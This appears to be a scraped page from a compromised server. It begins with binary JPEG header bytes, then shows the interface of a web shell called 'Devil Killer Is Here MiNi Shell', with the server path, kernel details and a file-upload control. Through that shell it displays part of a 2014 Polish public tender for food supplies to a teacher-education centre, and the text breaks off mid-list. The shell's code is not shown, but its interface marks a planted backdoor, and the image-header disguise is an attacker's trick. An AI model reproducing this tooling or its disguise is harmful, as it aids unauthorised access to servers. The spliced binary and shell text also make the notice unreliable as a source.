JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140117/11401-N-2014.html

<p class="kh_header"><b>Rzeszów: Sukcesywna dostawa artykułów przetworzonych, sypkich oraz przypraw, sukcesywna dostawa wyrobów czekoladowych i cukierniczych, sukcesywna dostawa produktów mleczarskich oraz sukcesywna dostawa owoców i warzyw dla potrzeb Podkarpackiego Centrum Edukacji Nauczycieli w Rzeszowie Oddział w Tarnobrzegu - Nr AG-3211/2/14</b><br>
<b>Numer ogłoszenia: 11401 - 2014; data zamieszczenia: 17.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Podkarpackie Centrum Edukacji Nauczycieli w Rzeszowie , ul. Niedzielskiego 2, 35-036 Rzeszów, woj. podkarpackie, tel. 17 8534097, faks 17 8534682.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcen.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa artykułów przetworzonych, sypkich oraz przypraw, sukcesywna dostawa wyrobów czekoladowych i cukierniczych, sukcesywna dostawa produktów mleczarskich oraz sukcesywna dostawa owoców i warzyw dla potrzeb Podkarpackiego Centrum Edukacji Nauczycieli w Rzeszowie Oddział w Tarnobrzegu - Nr AG-3211/2/14.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa artykułów przetworzonych, sypkich oraz przypraw, sukcesywna dostawa wyrobów czekoladowych i cukierniczych, sukcesywna dostawa produktów mleczarskich oraz sukcesywna dostawa owoców i warzyw dla potrzeb Podkarpackiego Centrum Edukacji Nauczycieli w Rzeszowie Oddział w Tarnobrzegu, w tym na potrzeby projektów współfinansowanych ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego:
-Edukacja skuteczna, przyjazna, nowoczesna - rozwój kompetencji kadry zarządzającej i pedagogicznej szkół i placówek oświatowych w województwie podkarpackim,
-Technologie cyfrowe jako systemowe narzędzie wspomagające realizację programów rozwojowych oraz podnoszące jakość i atrakcyjność oferty edukacyjnej szkół Podkarpacia.
Przedmiot zamówienia został podzielony na następujące części:
Część I Sukcesywna dostawa artykułów przetworzonych, sypkich oraz przypraw dla potrzeb PCEN w Rzeszowie Oddział w Tarnobrzegu, tj. Ananas plastry w syropie, puszka min. 560 g 40 szt., Bita śmietana w sprayu, opakowanie min. 250ml 10 szt., Brzoskwinia połówki w syropie, puszka min. 820g 30 szt., Bułka tarta 0,5kg 30 szt., Chrzan tarty, opakowanie min. 850 g 10 szt., Cukier biały sypki, opakowanie 1kg 300 szt., Cukier puder, opakowanie min.0,4kg 5 szt., Czosnek granulowany, opakowanie min. 1000 g 1 szt., Drożdże świeże, opakowanie min. 100g 3 szt., Dżem owocowy, różne smaki, opakowanie jednorazowe min. 25g 1000 szt., Fasola czerwona, puszka min. 400g 15 szt., Figi suszone, opakowanie min. 200 g 10 szt., Filet z makreli  w oleju, puszka min. 170g 10 szt., Gałka muszkatołowa mielona, opakowanie. min. 10g 10 szt., Groch łuskany żółty  1 kg, Groszek konserwowy, puszka  min. 400g 60 szt., Groszek ptysiowy, opakowanie min. 1kg 2 szt., Grzyb suszony - borowik, opakowanie min. 40g 4 szt., Herbata expresowa czarna,  opakowanie 100 torebek, z zawieszką 80 szt., Herbata owocowa,  opakowanie min. 20 torebek z zawieszką 50 szt., Herbata zielona, opakowanie min. 25 torebek z zawieszką 3 szt., Kapusta biała kiszona /kwaszona 50 kg, Kapusta czerwona krojona w zalewie, słoik min. 900g 20 szt., Kasza gryczana opakowanie min. 400 g 10 szt., Kasza jęczmienna perłowa średnia opakowanie min. 400 g 10 szt., Kasza jęczmienna perłowa w saszetkach, opakowanie 4 x min.100g 5 szt., Kawa naturalna drobnomielona opakowanie hermetyczne min.250g 150 szt., Kawa naturalna drobnomielona, opakowanie próżniowe min.250g 25 szt., Kawa naturalna ziarnista do ekspresu, 100% ARABICA opakowanie min. 1000g 2 szt., Kawa rozpuszczalna  typu creme, 100% kawy naturalnej opakowanie min. 180g	20 szt., Kawa rozpuszczalna granulowana 100% kawy naturalnej opakowanie min. 200g 100 szt., Kawa rozpuszczalna liofilizowana (forma łupków, kryształków), 100% kawy naturalnej, opakowanie min. 200g 50 szt., Ketchup opakowanie min. 900g 15 szt., Kiełki soi, puszka min. 400 g 30 szt., Kminek cały, opakowanie  500-650 g 1 szt., Koncentrat barszczu czerwonego, butelka min. 300 ml  30 szt., Koncentrat pomidorowy 30%, opakowanie min. 800g 15 szt., Kukurydza konserwowa, puszka min. 400 g 50 szt., Kwasek cytrynowy spożywczy, opakowanie  min. 500 g 1 szt., Liść laurowy, opakowanie  min. 100 g 10 szt., Majeranek, opakowanie  min. 400 g 1 szt., Majonez  opakowanie min. 300 ml 2 szt., Majonez, opakowanie min. 2,5l 20 szt., Makaron kokardki, opakowanie min. 3kg 5 szt., Makaron łazanki opakowanie min. 3kg 5 szt., Makaron muszelka mała opakowanie, min. 400g 3 szt., Makaron nitki, opakowanie min. 3kg 10 szt., Makaron spaghetti, opakowanie min. 500g 5 szt., Makaron świderki, opakowanie min. 3kg 8 szt., Makaron wstążki, opakowanie min. 3kg 5 szt., Mąka poznańska pszenna, typ 500 opakowanie  1kg 80 kg, Mąka ziemniaczana, opakowanie 0,5 kg 15 szt., Miód pszczeli, opakowanie jednorazowe min. 25g 1000 szt., Morela suszona,  opakowanie min. 200g 15 szt., Musztarda o jednolitej konsystencji, opakowanie min.900g 4 szt., Musztarda w saszetkach, opakowanie 50 szt. x min. 10 g 2 op., Natka pietruszki suszona, opakowanie min. 190 g 3 szt., Ocet  spirytusowy 10% butelka 1l 2 szt., Ogórek kiszony 30 kg, Ogórki konserwowe, słoik  min. 880 g 30 szt., Olej uniwersalny, opakowanie 5l 50 szt., Oliwa z oliwek, opakowanie min. 750ml	6 szt., Oliwki drylowane zielone lub czarne, słoik min.900g 9 szt., Papryka konserwowa, słoik min. 500g 30 szt., Papryka mielona ostra, opakowanie  min. 20 g 15 szt., Papryka mielona słodka, opakowanie  min. 20 g 10 szt., Pasztecik drobiowy, opakowanie jednorazowe  min. 50g 60 szt., Pędy bambusa, puszka minimum 425 g 30 szt., Pieczarki marynowane całe, słoik min. 800g 4 szt., Pieprz czarny mielony, opakowanie min. 0,5 kg 3 szt., Płatki śniadaniowe kukurydziane opakowanie min. 500g 7 szt., Pomidor suszony, opakowanie min. 280 g 10 szt., Przyprawa  sypka do mięsa mielonego, opakowanie min.  650g 1 szt., Przyprawa sypka do gyrosa,  opakowanie min.30g 20 szt., Przyprawa w płynie m.in.. do zup i sosów, opakowanie min. 5l 1 szt., Przyprawa warzywna sypka z cząsteczkami warzyw, opakowanie minimum 1kg 10 szt., Ravioli z serem, opakowanie min. 250g 20 szt., Rodzynki, opakowanie min. 1kg 5 szt., Rosół wołowy w proszku, opakowanie min. 900 g 1 szt., Rosół z kury w proszku, opakowanie min. 1 kg 1 szt., Ryż biały długoziarnisty opakowanie 1kg 30 szt., Seler marynowany w zalewie nitki, słoik min. 300g 6 szt., Sos biały w proszku,  opakowanie min. 25g 30 szt., Sos boloński do spaghetti w proszku, opakowanie min. 0,8 kg 2 szt., Sos deserowy - różne smaki, butelka min. 1kg 4 szt., Sos grzybowy w proszku opakowanie min. 0,8 kg 4 szt., Sos pieczeniowy w proszku, opakowanie min. 850 g 8 szt., Sól spożywcza, opakowanie 1kg 40 szt., Śliwka suszona, opakowanie min. 200g 15 szt., Śmietanka w płynie do kawy, opakowanie 10szt x min.10ml 60 op., Tortelini,  opakowanie min. 250g 6 szt., Tuńczyk w sosie własnym kawałki, puszka min. 170 g 20 szt., Ziele angielskie ziarno, opakowanie 400-600 g 2 szt., Żelatyna spożywcza, opakowanie 1kg 1 szt., Żurek  w proszku opakowanie min. 1kg 5 szt., 
Część II Sukcesywna dostawa wyrobów czekoladowych i cukierniczych dla potrzeb PCEN w Rzeszowie Oddział w Tarnobrzegu tj. Baton czekoladowy z nadzieniem o smaku advocat lub toffi lub orzechowym lub czekoladowym lub owocowym, opakowanie min. 40 g 25 szt., Ciastka kruche oblane czekoladą  2 kg, Ciastka kruche maślane 3 kg, Ciastka z ciasta francuskiego nadziewane dżemem owocowym lub czekoladą lub kremem toffi lub budyniem lub masą orzechową  90 kg, Ciastka typu markizy przełożone kremem o smaku śmietankowym lub owocowym lub cappucino lub czekoladowym lub orzechowym 5 kg, Ciastka kruche z marmoladą owocową 2 kg, Ciastka biszkoptowe z galaretką owocową oblane czekoladą białą lub ciemną 100 kg, Ciastka pierniczki w ciemnej czekoladzie z nadzieniem owocowym 10 kg, Ciastka pierniki oblane lukrem 5 kg, Ciastka typu warszawskie tj. ciastka kruche z bezą przekładane marmoladą lub masą o smaku orzechowym 40 kg, Ciastka kruche z bakaliami/czekoladą w środku 5 kg, Ciastka wafelki małe, różne smaki masy, bez polewy 30 kg, Ciastka wafelki małe z masą o różnym smaku - oblane ciemną czekoladą  10 kg, Ciastka wafelki różne smaki masy, oblane czekoladą 20 kg, Ciastka - pałeczki waflowe z masą o różnym smaku w czekoladzie ciemnej 30 kg, Ciastka kruche z marmoladą lub kawałkami czekolady, opakowanie min. 160g  3 szt., Czekoladki  nadziewane  różnym nadzieniem, osobno zawijane  5 kg, Rogalik z ciasta francuskiego z nadzieniem, opakowanie min. 45 g 30 szt., 
Część III	Sukcesywna dostawa produktów mleczarskich dla potrzeb PCEN w Rzeszowie Oddział w Tarnobrzegu tj. Jogurt grecki, opakowanie  min. 350 g 5 szt., Jogurt naturalny, opakowanie min. 340 g 10 szt., Jogurt owocowy mix smaków, opakowanie min. 150 g 1700 szt., Masło extra, zawartość tłuszczu min. 82 %, opakowanie min. 200 g 450 szt., Mleko UHT 2%, karton z możliwością wielokrotnego otwierania i zamykania - 1l 300 szt., Ser biały półtłusty 70 kg, Ser miękki w kostce sałatkowo-kanapkowy, opakowanie min. 200g 30 szt., Ser typu mozarella, opakowanie min. 125 g 8 szt., Ser żółty typu edamski 25 kg, Ser żółty typu gouda 40 kg, Serek topiony minimum 8 porcji krążek, różne smaki, opakowanie min. 140 g 15 op., Serek ziarnisty, opakowanie min. 200 g 10 szt., Ser camembert, opakowanie min. 120g 20 szt., Śmietana 18%, opakowanie min. 200g 300 szt., Śmietana 22%, opakowanie min. 200g 10 szt., 
Część IV	Sukcesywna dostawa owoców i warzyw dla potrzeb PCEN w Rzeszowie Oddział w Tarnobrzegu tj. Banan 40 kg, Brokuł 15 szt., Brzoskwinia 20 kg, Burak czerwony 80 kg, Cebula sucha 100 kg, Cytryna 40 kg, Czosnek główka, uprawiany w krajach Unii Europejskiej 50 szt., Fasola typu jaś średniej wielkości 2 kg, Jabłka słodkie deserowe średniej wielkości 30 kg, Kalafior 5 szt., Kapusta biała głowiasta 100 kg, Kapusta pekińska 60 szt., Kiwi 2 kg, Koperek świeży - pęczek 100 szt., Mandarynka 150 kg, Marchew średniej wielkości 100 kg, Melon 10 szt., Nektarynka 10 kg, Ogórek szklarniowy średniej wielkości 100 kg, Papryka czerwona 50 kg, Pieczarka 20 kg, Pietruszka korzeń średniej wielkości 15 kg, Pietruszka natka pęczek 150 szt., Pomidor 150 kg, Pomidor koktajlowy, opakowanie min. 0,5 kg 20 op., Por 10 szt., Rzodkiewka pęczek 40 szt., Sałata lodowa 30 szt., Sałata zielona 130 szt., Seler naciowy pęczek 5 szt.,Seler średniej wielkości 40 kg, Szczypior pęczek 100 szt., Winogrono duże słodkie - białe lub ciemne 10 kg, Ziemniaki jadalne (jednoodmianowe dostawy) średniej wielkości 400 kg, Ziemniaki jadalne młode (jednoodmianowe dostawy) średniej wielkości 500 kg.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.86.00.00-4, 15.87.10.00-4, 15.83.00.00-5, 15.87.24.00-5, 15.85.10.00-8, 15.89.10.00-0, 15.89.80.00-9, 15.33.14.27-6, 15.89.40.00-1, 15.33.00.00-0, 15.33.14.00-1, 15.23.50.00-4, 15.82.00.00-2, 15.84.23.00-5, 15.84.22.00-4, 15.50.00.00-3, 03.22.10.00-6, 03.22.21.10-7, 03.22.23.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca ubiegający się o udzielenie zamówienia publicznego zobowiązany jest złożyć: a. Wypełniony druk Oferta - załącznik nr 2 do SIWZ wraz z formularzem cenowym/formularzami cenowymi odpowiednimi dla części zamówienia, na którą składana jest oferta - odpowiednie załączniki nr 1a - 1d do SIWZ. Dla uznania ważności, oferta musi zawierać także wszystkie wymagane w niniejszym rozdziale SIWZ oświadczenia i dokumenty. b. Pełnomocnictwo do reprezentowania Wykonawcy (w przypadku gdy nie wynika ono z załączonych dokumentów) - np. według załącznika nr 5 do SIWZ - jeżeli dotyczy. c. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia musi być załączone pełnomocnictwo zgodnie z art. 23 ust. 2 ustawy. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie (w formie oryginału) tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian postanowień zawartej umowy w zakresie: a. zmiany wynagrodzenia Wykonawcy za wykonanie zamówienia, w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym ustawowej stawki podatku od towarów i usług, b. zmiany terminu wykonania zamówienia w przypadku wystąpienia: - siły wyższej. Siła wyższa - oznacza wydarzenie nieprzewidywalne i poza kontrolą stron umowy występujące po podpisaniu umowy, a powodujące niemożliwość wywiązywania się z umowy w jej obecnym brzmieniu, - innych uzasadnionych przyczyn pod warunkiem, że zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Jeżeli Zamawiający uzna, że zaistniałe okoliczności stanowiące podstawę do zmiany w umowie nie są zasadne, Wykonawca zobowiązany jest do realizacji zadania zgodnie z zawartą umową</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pcen.pl/zamowienia-publiczne/postepowania-powyzej-14-tys.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Podkarpackie Centrum Edukacji Nauczycieli w Rzeszowie, ul. Niedzielskiego 2, 35-036 Rzeszów, pokój nr 202.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2014 godzina 10:00, miejsce: Podkarpackie Centrum Edukacji Nauczycieli w Rzeszowie, ul. Niedzielskiego 2, 35-036 Rzeszów, pokój nr 1 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotem zamówienia jest sukcesywna dostawa artykułów przetworzonych, sypkich oraz przypraw, sukcesywna dostawa wyrobów czekoladowych i cukierniczych, sukcesywna dostawa produktów mleczarskich oraz sukcesywna dostawa owoców i warzyw dla potrzeb Podkarpackiego Centrum Edukacji Nauczycieli w Rzeszowie Oddział w Tarnobrzegu, w tym na potrzeby projektów współfinansowanych ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego: - Edukacja skuteczna, przyjazna, nowoczesna - rozwój kompetencji kadry zarządzającej i pedagogicznej szkół i placówek oświatowych w województwie podkarpackim, - Technologie cyfrowe jako systemowe narzędzie wspomagające realizację programów rozwojowych oraz podnoszące jakość i atrakcyjność oferty edukacyjnej szkół Podkarpacia.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sukcesywna dostawa artykułów przetworzonych, sypkich oraz przypraw dla potrzeb PCEN w Rzeszowie Oddział w Tarnobrzegu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas plastry w syropie, puszka min. 560 g 40 szt., Bita śmietana w sprayu, opakowanie min. 250ml 10 szt., Brzoskwinia połówki w syropie, puszka min. 820g 30 szt., Bułka tarta 0,5kg 30 szt., Chrzan tarty, opakowanie min. 850 g 10 szt., Cukier biały sypki, opakowanie 1kg 300 szt., Cukier puder, opakowanie min.0,4kg 5 szt., Czosnek granulowany, opakowanie min. 1000 g 1 szt., Drożdże świeże, opakowanie min. 100g 3 szt., Dżem owocowy, różne smaki, opakowanie jednorazowe min. 25g 1000 szt., Fasola czerwona, puszka min. 400g 15 szt., Figi suszone, opakowanie min. 200 g 10 szt., Filet z makreli  w oleju, puszka min. 170g 10 szt., Gałka muszkatołowa mielona, opakowanie. min. 10g 10 szt., Groch łuskany żółty  1 kg, Groszek konserwowy, puszka  min. 400g 60 szt., Groszek ptysiowy, opakowanie min. 1kg 2 szt., Grzyb suszony - borowik, opakowanie min. 40g 4 szt., Herbata expresowa czarna,  opakowanie 100 torebek, z zawieszką 80 szt., Herbata owocowa,  opakowanie min. 20 torebek z zawieszką 50 szt., Herbata zielona, opakowanie min. 25 torebek z zawieszką 3 szt., Kapusta biała kiszona /kwaszona 50 kg, Kapusta czerwona krojona w zalewie, słoik min. 900g 20 szt., Kasza gryczana opakowanie min. 400 g 10 szt., Kasza jęczmienna perłowa średnia opakowanie min. 400 g 10 szt., Kasza jęczmienna perłowa w saszetkach, opakowanie 4 x min.100g 5 szt., Kawa naturalna 